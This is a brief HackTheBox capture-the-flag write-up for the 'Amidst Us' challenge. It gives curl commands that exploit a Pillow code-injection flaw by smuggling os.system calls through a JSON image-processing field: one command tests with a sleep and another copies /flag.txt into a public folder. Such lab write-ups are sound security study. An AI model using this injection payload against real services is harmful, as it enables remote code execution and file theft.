HackTheBox Amidst Us Challenge

2025-02-28[Updated: 2025-02-28]

https://app.hackthebox.com/challenges/325

Description

The Amidst-Us tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and bonnie have infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?

Exploitation

https://security.snyk.io/vuln/SNYK-PYTHON-PILLOW-2331901

check

time curl 94.237.53.146:46950/api/alphafy -d '{"background":["exec(\"import os; os.system(\\\"sleep 5\\\")\")",255,255],"image":"'$(base64 challenge/application/static/images/arrow.png)'"}' -H 'Content-Type: application/json'

exploit

curl 94.237.53.146:46950/api/alphafy \
  -H 'Content-Type: application/json' \
  -d "{\"background\":[\"exec('import os;os.system(\\\\'cat /flag.txt > /app/application/static/flag.txt\\\\')')\",0,0],\"image\":\"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==\"}"

curl 94.237.53.146:46950/static/flag.txt

Summary

Amidst Us: find the command execution path, trigger it cleanly, and read the flag.